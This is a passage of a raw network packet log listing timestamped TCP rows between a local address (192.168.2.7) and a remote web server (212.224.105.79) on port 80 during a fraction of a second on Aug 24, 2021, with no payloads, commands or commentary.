Aug 24, 2021 08:46:56.404613018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404764891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404803991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404820919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404841900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404860973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404877901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404879093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404891968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404901981 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404910088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404931068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404934883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404951096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404968977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404985905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404997110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405004025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405021906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405039072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405049086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405059099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405070066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405080080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405091047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405098915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405116081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405133009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405142069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405152082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405169010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405175924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405180931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405194044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405206919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405220032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405236959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405240059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405252934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405272961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.405281067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.405312061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.406214952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.406244993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.406323910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427660942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427695036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427711010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427728891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427741051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427762985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427783012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427791119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427838087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427844048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427861929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427876949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427886009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427896023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427911997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427931070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427934885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427951097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427964926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.427969933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.427988052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428000927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428013086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428021908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428031921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428039074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428049088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428066015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428075075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428082943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428103924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428114891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428122997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428139925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428157091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428164959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428174019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428181887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428190947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428204060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428216934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428229094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428239107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428255081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428267002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428275108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428282976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428293943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428311110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428322077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428333998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428359032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428375959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428391933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428400993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428411007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428427935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428445101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428457975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428474903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428491116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428494930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428507090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428523064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428534985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428544998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428558111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428567886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428586006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428601980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428618908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428632021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428636074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428654909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428673029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428684950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428689003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428705931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428710938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428725958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428742886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428745031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428759098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428771019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428775072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428795099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428795099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428812981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428829908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428829908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428845882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428862095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428865910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428878069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.428895950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.428920984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.429048061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.450956106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.450993061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451004982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451021910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451037884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451054096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451070070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451086044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451105118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451148987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451179981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451198101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451200962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451212883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451229095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451231956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451248884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451267958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451276064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451283932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451299906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451316118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451316118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451330900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451344967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451347113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451363087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451379061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451381922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451396942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451399088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451415062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451431990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451435089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451447964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451462984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451476097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451478958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451494932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451503038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451514959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451528072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451533079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451549053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451562881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451565027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451581001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451596975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451601982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451612949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451627970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451628923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451649904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451654911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451667070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451682091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451698065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451706886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451715946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451731920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451746941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451747894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451764107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451777935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451782942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451800108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451809883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451817036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451833010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451837063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451848984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451864958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451874018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451880932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451896906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451914072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451915979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451932907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451944113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451950073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451967955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.451968908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.451986074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452002048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452003002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452025890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452039957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452061892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452073097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452079058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452095032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452111006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452126980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452127934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452142954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.452155113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452290058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.452464104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474566936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474598885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474616051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474632978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474648952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474668980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474685907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474701881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474708080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474718094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474734068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474750042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474766970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474769115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474783897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474797010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474812984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474818945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474828959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474833965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474844933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474860907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474862099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474879980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474895000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474896908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474912882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474924088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474929094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474945068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474946022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474961996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474972010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.474977970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.474993944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475013971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475013971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475030899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475047112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475049973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475063086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475074053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475080013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475095987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475102901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475111961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475143909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475152969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475168943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475184917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475195885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475203037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475224018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475234032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475244999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475261927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475265980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475280046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475296974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475305080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475313902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475328922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475330114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475347042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475372076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475379944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475399971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475416899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475425005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475433111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475449085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475465059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475466967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475480080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475481033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475496054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475512028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475517035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475532055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475548983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475563049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475564957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475581884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475584030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475598097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475613117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475617886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475629091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475646019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475666046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475666046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.475684881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.475697994 CEST	49715	80	192.168.2.7	212.224.105.79
